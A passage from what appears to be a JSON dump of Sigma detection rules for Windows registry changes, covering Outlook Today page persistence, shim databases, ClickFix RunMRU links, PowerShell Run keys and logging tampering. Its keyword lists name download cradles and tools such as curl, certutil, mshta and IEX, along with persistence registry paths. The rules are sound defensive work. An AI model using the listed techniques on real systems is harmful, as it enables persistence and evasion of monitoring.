'\\Software\\Microsoft\\Office\\'\n            - '\\Outlook\\WebView\\'\n        TargetObject|endswith: '\\URL'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_persistence_outlook_todaypage.yml",
    "content": "title: Potential Persistence Via Outlook Today Page\nid: 487bb375-12ef-41f6-baae-c6a1572b4dd1\nrelated:\n    - id: ddd171b5-2cc6-4975-9e78-f0eccd08cc76\n      type: similar\nstatus: test\ndescription: |\n    Detects potential persistence activity via outlook today page.\n    An attacker can set a custom page to execute arbitrary code and link to it via the registry values \"URL\" and \"UserDefinedUrl\".\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=74\n    - https://trustedsec.com/blog/specula-turning-outlook-into-a-c2-with-one-registry-change\nauthor: Tobias Michalski (Nextron Systems), David Bertho (@dbertho) & Eirik Sveen (@0xSV1), Storebrand\ndate: 2021-06-10\nmodified: 2024-08-07\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1112\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection_main:\n        TargetObject|contains|all:\n            - 'Software\\Microsoft\\Office\\'\n            - '\\Outlook\\Today\\'\n    selection_value_stamp:\n        TargetObject|endswith: '\\Stamp'\n        Details: 'DWORD (0x00000001)'\n    selection_value_url:\n        TargetObject|endswith:\n            - '\\URL'\n            - '\\UserDefinedUrl'\n    filter_main_office:\n        Image|startswith:\n            - 'C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\'\n            - 'C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\'\n        Image|endswith: '\\OfficeClickToRun.exe'\n    condition: selection_main and 1 of selection_value_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_persistence_reflectdebugger.yml",
    "content": "title: Potential WerFault ReflectDebugger Registry Value Abuse\nid: 0cf2e1c6-8d10-4273-8059-738778f981ad\nrelated:\n    - id: fabfb3a7-3ce1-4445-9c7c-3c27f1051cdd\n      type: derived\nstatus: test\ndescription: Detects potential WerFault \"ReflectDebugger\" registry value abuse for persistence.\nreferences:\n    - https://cocomelonc.github.io/malware/2022/11/02/malware-pers-18.html\n    - https://www.hexacorn.com/blog/2018/08/31/beyond-good-ol-run-key-part-85/\nauthor: X__Junior\ndate: 2023-05-18\ntags:\n    - attack.defense-evasion\n    - attack.t1036.003\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\Microsoft\\Windows\\Windows Error Reporting\\Hangs\\ReflectDebugger'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_persistence_scrobj_dll.yml",
    "content": "title: Potential Persistence Via Scrobj.dll COM Hijacking\nid: fe20dda1-6f37-4379-bbe0-a98d400cae90\nstatus: test\ndescription: Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md\nauthor: frack113\ndate: 2022-08-20\nmodified: 2023-08-17\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.015\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: 'InprocServer32\\(Default)'\n        Details: 'C:\\WINDOWS\\system32\\scrobj.dll'\n    condition: selection\nfalsepositives:\n    - Legitimate use of the dll.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_persistence_shim_database.yml",
    "content": "title: Potential Persistence Via Shim Database Modification\nid: dfb5b4e8-91d0-4291-b40a-e3b0d3942c45\nstatus: test\ndescription: |\n    Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\n    The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-3---registry-key-creation-andor-modification-events-for-sdb\n    - https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html\n    - https://andreafortuna.org/2018/11/12/process-injection-and-persistence-using-application-shimming/\nauthor: frack113\ndate: 2021-12-30\nmodified: 2025-10-22\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.011\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains:\n            - '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB\\'\n            - '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Custom\\'\n    filter_main_empty_string:\n        Details: ''\n    filter_main_empty_value:\n        Details: '(Empty)'\n    filter_main_null:\n        Details: null\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate custom SHIM installations will also trigger this rule\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_persistence_shim_database_susp_application.yml",
    "content": "title: Suspicious Shim Database Patching Activity\nid: bf344fea-d947-4ef4-9192-34d008315d3a\nstatus: test\ndescription: Detects installation of new shim databases that try to patch sections of known processes for potential process injection or persistence.\nreferences:\n    - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/\n    - https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-01\nmodified: 2023-12-06\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.011\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Custom\\'\n        TargetObject|endswith:\n            # Note: add other applications to increase coverage\n            - '\\csrss.exe'\n            - '\\dllhost.exe'\n            - '\\explorer.exe'\n            - '\\RuntimeBroker.exe'\n            - '\\services.exe'\n            - '\\sihost.exe'\n            - '\\svchost.exe'\n            - '\\taskhostw.exe'\n            - '\\winlogon.exe'\n            - '\\WmiPrvSe.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_persistence_shim_database_uncommon_location.yml",
    "content": "title: Potential Persistence Via Shim Database In Uncommon Location\nid: 6b6976a3-b0e6-4723-ac24-ae38a737af41\nstatus: test\ndescription: Detects the installation of a new shim database where the file is located in a non-default location\nreferences:\n    - https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html\n    - https://andreafortuna.org/2018/11/12/process-injection-and-persistence-using-application-shimming/\n    - https://www.blackhat.com/docs/asia-14/materials/Erickson/Asia-14-Erickson-Persist-It-Using-And-Abusing-Microsofts-Fix-It-Patches.pdf\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-01\nmodified: 2023-08-17\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.011\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains|all:\n            - '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB\\'\n            - '\\DatabasePath'\n    filter_main_known_locations:\n        Details|contains: ':\\Windows\\AppPatch\\Custom'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_persistence_typed_paths.yml",
    "content": "title: Potential Persistence Via TypedPaths\nid: 086ae989-9ca6-4fe7-895a-759c5544f247\nstatus: test\ndescription: Detects a modification or addition to the 'TypedPaths' key in the user or admin registry by a non-standard application, which might indicate a persistence attempt\nreferences:\n    - https://twitter.com/dez_/status/1560101453150257154\n    - https://forensafe.com/blogs/typedpaths.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-22\nmodified: 2023-08-17\ntags:\n    - attack.persistence\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\TypedPaths\\'\n    filter:\n        Image:\n            - 'C:\\Windows\\explorer.exe'\n            - 'C:\\Windows\\SysWOW64\\explorer.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_persistence_xll.yml",
    "content": "title: Potential Persistence Via Excel Add-in - Registry\nid: 961e33d1-4f86-4fcf-80ab-930a708b2f82\nstatus: test\ndescription: Detects potential persistence via the creation of an Excel add-in (XLL) file that is run automatically when Excel is started.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/4ae9580a1a8772db87a1b6cdb0d03e5af231e966/atomics/T1137.006/T1137.006.md\n    - https://labs.withsecure.com/publications/add-in-opportunities-for-office-persistence\nauthor: frack113\ndate: 2023-01-15\nmodified: 2023-08-17\ntags:\n    - attack.persistence\n    - attack.t1137.006\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|contains: 'Software\\Microsoft\\Office\\'\n        TargetObject|endswith: '\\Excel\\Options'\n        Details|startswith: '/R '\n        Details|endswith: '.xll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_policies_associations_tamper.yml",
    "content": "title: Potential Attachment Manager Settings Associations Tamper\nid: a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47\nstatus: test\ndescription: Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)\nreferences:\n    - https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738\n    - https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-01\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_main:\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Associations\\'\n    selection_value_default_file_type_risk:\n        TargetObject|endswith: '\\DefaultFileTypeRisk'\n        Details: 'DWORD (0x00006152)'\n    selection_value_low_risk_filetypes:\n        TargetObject|endswith: '\\LowRiskFileTypes'\n        Details|contains: # Add more as you see fit\n            - '.zip;'\n            - '.rar;'\n            - '.exe;'\n            - '.bat;'\n            - '.com;'\n            - '.cmd;'\n            - '.reg;'\n            - '.msi;'\n            - '.htm;'\n            - '.html;'\n    condition: selection_main and 1 of selection_value_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_policies_attachments_tamper.yml",
    "content": "title: Potential Attachment Manager Settings Attachments Tamper\nid: ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a\nstatus: test\ndescription: Detects tampering with attachment manager settings policies attachments (See reference for more information)\nreferences:\n    - https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738\n    - https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-01\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_main:\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Attachments\\'\n    selection_value_hide_zone_info:\n        TargetObject|endswith: '\\HideZoneInfoOnProperties'\n        Details: 'DWORD (0x00000001)' # On\n    selection_value_save_zone_info:\n        TargetObject|endswith: '\\SaveZoneInformation'\n        Details: 'DWORD (0x00000002)' # Off\n    selection_value_scan_with_av:\n        TargetObject|endswith: '\\ScanWithAntiVirus'\n        Details: 'DWORD (0x00000001)' # Disabled\n    condition: selection_main and 1 of selection_value_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_potential_clickfix_execution.yml",
    "content": "title: Potential ClickFix Execution Pattern - Registry\nid: f5fe36cf-f1ec-4c23-903d-09a3110f6bbb\nrelated:\n    - id: d487ed4a-fd24-436d-a0b2-f4e95f7b2635\n      type: similar\nstatus: experimental\ndescription: |\n    Detects potential ClickFix malware execution patterns by monitoring registry modifications in RunMRU keys containing HTTP/HTTPS links.\n    ClickFix is known to be distributed through phishing campaigns and uses techniques like clipboard hijacking and fake CAPTCHA pages.\n    Through the fake CAPTCHA pages, the adversary tricks users into opening the Run dialog box and pasting clipboard-hijacked content,\n    such as one-liners that execute remotely hosted malicious files or scripts.\nreferences:\n    - https://github.com/JohnHammond/recaptcha-phish\n    - https://www.zscaler.com/blogs/security-research/deepseek-lure-using-captchas-spread-malware\n    - https://www.threatdown.com/blog/clipboard-hijacker-tries-to-install-a-trojan/\n    - https://app.any.run/tasks/5c16b4db-4b36-4039-a0ed-9b09abff8be2\n    - https://www.esentire.com/security-advisories/netsupport-rat-clickfix-distribution\n    - https://medium.com/@boutnaru/the-windows-foreniscs-journey-run-mru-run-dialog-box-most-recently-used-57375a02d724\n    - https://unit42.paloaltonetworks.com/preventing-clickfix-attack-vector/\n    - https://medium.com/@poudelswachchhanda123/preventing-lnk-and-fakecaptcha-threats-a-system-hardening-approach-2f7b7ed2e493\n    - https://www.scpx.com.au/2025/11/16/decades-old-finger-protocol-abused-in-clickfix-malware-attacks/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-03-25\nmodified: 2025-11-19\ntags:\n    - attack.execution\n    - attack.t1204.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_registry:\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\'\n    selection_details:\n        Details|contains:\n            - 'http://'\n            - 'https://'\n    selection_susp_pattern:\n        - Details|contains:\n              # Add more suspicious keywords\n              - 'account'\n              - 'anti-bot'\n              - 'botcheck'\n              - 'captcha'\n              - 'challenge'\n              - 'confirmation'\n              - 'fraud'\n              - 'human'\n              - 'identification'\n              - 'identificator'\n              - 'identity'\n              - 'robot'\n              - 'validation'\n              - 'verification'\n              - 'verify'\n        - Details|contains:\n              - '%comspec%'\n              - 'bitsadmin'\n              - 'certutil'\n              - 'cmd'\n              - 'cscript'\n              - 'curl'\n              - 'finger'\n              - 'mshta'\n              - 'powershell'\n              - 'pwsh'\n              - 'regsvr32'\n              - 'rundll32'\n              - 'schtasks'\n              - 'wget'\n              - 'wscript'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate applications using RunMRU with HTTP links\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_potential_oci_dll_redirection.yml",
    "content": "title: Registry Modification for OCI DLL Redirection\nid: c0e0bdec-3e3d-47aa-9974-05539c999c89\nstatus: experimental\ndescription: |\n    Detects registry modifications related to 'OracleOciLib' and 'OracleOciLibPath' under 'MSDTC' settings.\n    Threat actors may modify these registry keys to redirect the loading of 'oci.dll' to a malicious DLL, facilitating phantom DLL hijacking via the MSDTC service.\nreferences:\n    - https://www.crowdstrike.com/en-us/blog/4-ways-adversaries-hijack-dlls/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2026-01-24\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1112\n    - attack.t1574.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_ocilib:\n        TargetObject|endswith: '\\SOFTWARE\\Microsoft\\MSDTC\\MTxOCI\\OracleOciLib'\n    filter_main_ocilib_file:\n        # Filters out the default value; the rule fires when the DLL name is changed to something other than oci.dll, e.g. evil.dll\n        Details|contains: 'oci.dll'\n    selection_ocilibpath:\n        TargetObject|endswith: '\\SOFTWARE\\Microsoft\\MSDTC\\MTxOCI\\OracleOciLibPath'\n    filter_main_ocilibpath:\n        # Filters out the default location; the rule fires when the oci.dll path is changed to a different directory, e.g. 'C:\\Windows\\Temp\\'\n        Details|contains: '%SystemRoot%\\System32\\'\n    condition: (selection_ocilib and not filter_main_ocilib_file) or (selection_ocilibpath and not filter_main_ocilibpath)\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_powershell_as_service.yml",
    "content": "title: PowerShell as a Service in Registry\nid: 4a5f5a5e-ac01-474b-9b4e-d61298c9df1d\nstatus: test\ndescription: Detects PowerShell code being written to the registry as a service.\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse\nauthor: oscd.community, Natalia Shornikova\ndate: 2020-10-06\nmodified: 2023-08-17\ntags:\n    - attack.execution\n    - attack.t1569.002\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\Services\\'\n        TargetObject|endswith: '\\ImagePath'\n        Details|contains:\n            - 'powershell'\n            - 'pwsh'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_powershell_enablescripts_enabled.yml",
    "content": "title: PowerShell Script Execution Policy Enabled\nid: 8218c875-90b9-42e2-b60d-0b0069816d10\nrelated:\n    - id: fad91067-08c5-4d1a-8d8c-d96a21b37814\n      type: derived\nstatus: test\ndescription: Detects the enabling of the PowerShell script execution policy. Once enabled, this policy allows scripts to be executed.\nreferences:\n    - https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.PowerShell::EnableScripts\nauthor: Nasreddine Bencherchali (Nextron Systems), Thurein Oo\ndate: 2023-10-18\ntags:\n    - attack.execution\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\Policies\\Microsoft\\Windows\\PowerShell\\EnableScripts'\n        Details: 'DWORD (0x00000001)'\n    condition: selection\nfalsepositives:\n    - Likely\nlevel: low\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_powershell_execution_policy.yml",
    "content": "title: Potential PowerShell Execution Policy Tampering\nid: fad91067-08c5-4d1a-8d8c-d96a21b37814\nrelated:\n    - id: cf2e938e-9a3e-4fe8-a347-411642b28a9f # Registry\n      type: similar\n    - id: 87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180 # ProcCreation Cmdlet\n      type: similar\n    - id: 61d0475c-173f-4844-86f7-f3eebae1c66b # PowerShell ScriptBlock\n      type: similar\nstatus: test\ndescription: Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution\nreferences:\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.3\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-11\nmodified: 2023-12-14\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith:\n            # Note for future readers: For PowerShell 7+ the ExecutionPolicy is handled via a setting file due to the fact that PWSH7 is available for mac and linux\n            # Attackers can create a per-user setting file (powershell.config.json) and set the execution policy there\n            # Learn more here: https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_powershell_config?view=powershell-7.3\n            - '\\ShellIds\\Microsoft.PowerShell\\ExecutionPolicy'\n            - '\\Policies\\Microsoft\\Windows\\PowerShell\\ExecutionPolicy'\n        Details|contains:\n            - 'Bypass'\n            - 'Unrestricted'\n    filter_main_svchost:\n        # Note: We filter out \"svchost\" to avoid FP with changes using \"gpedit\" for example.\n        Image|contains:\n            - ':\\Windows\\System32\\'\n            - ':\\Windows\\SysWOW64\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_powershell_in_run_keys.yml",
    "content": "title: Suspicious PowerShell In Registry Run Keys\nid: 8d85cf08-bf97-4260-ba49-986a2a65129c\nstatus: test\ndescription: Detects potential PowerShell commands or code within registry run keys\nreferences:\n    - https://github.com/frack113/atomic-red-team/blob/a9051c38de8a5320b31c7039efcbd3b56cf2d65a/atomics/T1547.001/T1547.001.md#atomic-test-9---systembc-malware-as-a-service-registry\n    - https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html\n    - https://github.com/HackTricks-wiki/hacktricks/blob/e4c7b21b8f36c97c35b7c622732b38a189ce18f7/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md\nauthor: frack113, Florian Roth (Nextron Systems)\ndate: 2022-03-17\nmodified: 2025-07-18\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains:\n            - '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' # Also covers \"RunOnce\" and \"RunOnceEx\"\n            - '\\Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run'\n            - '\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run'\n        Details|contains:\n            - 'powershell'\n            - 'pwsh '\n            - 'FromBase64String'\n            - '.DownloadFile('\n            - '.DownloadString('\n            - ' -w hidden '\n            - ' -w 1 '\n            - '-windowstyle hidden'\n            - '-window hidden'\n            - ' -nop '\n            - ' -encodedcommand '\n            - '-ExecutionPolicy Bypass'\n            - 'Invoke-Expression'\n            - 'IEX ('\n            - 'Invoke-Command'\n            - 'ICM -'\n            - 'Invoke-WebRequest'\n            - 'IWR '\n            - 'Invoke-RestMethod'\n            - 'IRM '\n            - ' -noni '\n            - ' -noninteractive '\n    condition: selection\nfalsepositives:\n    - Legitimate admin or third party scripts. Baseline according to your environment\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_powershell_logging_disabled.yml",
    "content": "title: PowerShell Logging Disabled Via Registry Key Tampering\nid: fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7\nstatus: test\ndescription: Detects changes to the registry for the currently logged-in user in order to disable PowerShell module logging, script block logging, transcription or script execution logging\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-32---windows-powershell-logging-disabled\nauthor: frack113\ndate: 2022-04-02\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.t1564.001\n    - attack.t1112\n    - attack.persistence\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains:\n            - '\\Microsoft\\Windows\\PowerShell\\' # PowerShell 5\n            - '\\Microsoft\\PowerShellCore\\' # PowerShell 7\n        TargetObject|endswith:\n            - '\\ModuleLogging\\EnableModuleLogging'\n            - '\\ScriptBlockLogging\\EnableScriptBlockLogging'\n            - '\\ScriptBlockLogging\\EnableScriptBlockInvocationLogging'\n            - '\\Transcription\\EnableTranscripting'\n            - '\\Transcription\\EnableInvocationHeader'\n            - '\\EnableScripts'\n        Details: 'DWORD (0x00000000)'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_powershell_logging_disabled/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Disable PowerShell Logging via Registry\n      technique: T1112\n      atomic_guid: 95b25212-91a7-42ff-9613-124aca6845a8\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_provisioning_command_abuse.yml",
    "content": "title: Potential Provisioning Registry Key Abuse For Binary Proxy Execution - REG\nid: 7021255e-5db3-4946-a8b9-0ba7a4644a69\nrelated:\n    - id: 7f5d1c9a-3e83-48df-95a7-2b98aae6c13c # CLI Generic\n      type: similar\n    - id: f9999590-1f94-4a34-a91e-951e47bedefd # CLI Abuse\n      type: similar\n    - id: 2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25 # CLI Registry\n      type: similar\nstatus: test\ndescription: Detects potential abuse of the provisioning registry key for indirect command execution through \"Provlaunch.exe\".\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/\n    - https://twitter.com/0gtweet/status/1674399582162153472\nauthor: Swachchhanda Shrawan Poudel\ndate: 2023-08-02\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: registry_set\n    product: windows\n    definition: 'Requirements: The registry key \"\\SOFTWARE\\Microsoft\\Provisioning\\Commands\\\" and its subkey must be monitored'\ndetection:\n    selection:\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\Provisioning\\Commands\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_pua_sysinternals_execution_via_eula.yml",
    "content": "title: PUA - Sysinternal Tool Execution - Registry\nid: 25ffa65d-76d8-4da5-a832-3f2b0136e133\nstatus: test\ndescription: Detects the execution of a Sysinternals Tool via the creation of the \"accepteula\" registry key\nreferences:\n    - https://twitter.com/Moti_B/status/1008587936735035392\nauthor: Markus Neis\ndate: 2017-08-28\nmodified: 2025-10-26\ntags:\n    - attack.resource-development\n    - attack.t1588.002\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|endswith: '\\EulaAccepted'\n    condition: selection\nfalsepositives:\n    - Legitimate use of SysInternals tools\n    - Programs that use the same Registry Key\nlevel: low\nregression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_pua_sysinternals_execution_via_eula/info.yml\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_pua_sysinternals_renamed_execution_via_eula.yml",
    "content": "title: Suspicious Execution Of Renamed Sysinternals Tools - Registry\nid: f50f3c09-557d-492d-81db-9064a8d4e211\nrelated:\n    - id: 25ffa65d-76d8-4da5-a832-3f2b0136e133\n      type: derived\n    - id: 8023f872-3f1d-4301-a384-801889917ab4\n      type: similar\nstatus: test\ndescription: Detects the creation of the \"accepteula\" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool)\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-24\nmodified: 2025-10-26\ntags:\n    - attack.resource-development\n    - attack.t1588.002\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|contains:\n            # Please add new values while respecting the alphabetical order\n            - '\\Active Directory Explorer'\n            - '\\Handle'\n            - '\\LiveKd'\n            - '\\ProcDump'\n            - '\\Process Explorer'\n            - '\\PsExec'\n            - '\\PsLoggedon'\n            - '\\PsLoglist'\n            - '\\PsPasswd'\n            - '\\PsPing'\n            - '\\PsService'\n            - '\\SDelete'\n        TargetObject|endswith: '\\EulaAccepted'\n    filter:\n        Image|endswith:\n            # Please add new values while respecting the alphabetical order\n            - '\\ADExplorer.exe'\n            - '\\ADExplorer64.exe'\n            - '\\handle.exe'\n            - '\\handle64.exe'\n            - '\\livekd.exe'\n            - '\\livekd64.exe'\n            - '\\procdump.exe'\n            - '\\procdump64.exe'\n            - '\\procexp.exe'\n            - '\\procexp64.exe'\n            - '\\PsExec.exe'\n            - '\\PsExec64.exe'\n            - '\\PsLoggedon.exe'\n            - '\\PsLoggedon64.exe'\n            - '\\psloglist.exe'\n            - '\\psloglist64.exe'\n            - '\\pspasswd.exe'\n            - '\\pspasswd64.exe'\n            - '\\PsPing.exe'\n            - '\\PsPing64.exe'\n            - '\\PsService.exe'\n            - '\\PsService64.exe'\n            - '\\sdelete.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Unlikely\nlevel: high\nregression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_pua_sysinternals_renamed_execution_via_eula/info.yml\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_pua_sysinternals_susp_execution_via_eula.yml",
    "content": "title: PUA - Sysinternals Tools Execution - Registry\nid: c7da8edc-49ae-45a2-9e61-9fd860e4e73d\nrelated:\n    - id: 25ffa65d-76d8-4da5-a832-3f2b0136e133\n      type: derived\n    - id: 9841b233-8df8-4ad7-9133-b0b4402a9014\n      type: obsolete\nstatus: test\ndescription: Detects the execution of some potentially unwanted tools such as PsExec, Procdump, etc. (part of the Sysinternals suite) via the creation of the \"accepteula\" registry key.\nreferences:\n    - https://twitter.com/Moti_B/status/1008587936735035392\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-24\nmodified: 2025-10-26\ntags:\n    - attack.resource-development\n    - attack.t1588.002\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|contains:\n            - '\\Active Directory Explorer'\n            - '\\Handle'\n            - '\\LiveKd'\n            - '\\Process Explorer'\n            - '\\ProcDump'\n            - '\\PsExec'\n            - '\\PsLoglist'\n            - '\\PsPasswd'\n            - '\\SDelete'\n            - '\\Sysinternals' # Global level https://twitter.com/leonzandman/status/1561736801953382400\n        TargetObject|endswith: '\\EulaAccepted'\n    condition: selection\nfalsepositives:\n    - Legitimate use of SysInternals tools. Filter the legitimate paths used in your environment\nlevel: medium\nregression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_pua_sysinternals_susp_execution_via_eula/info.yml\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_renamed_sysinternals_eula_accepted.yml",
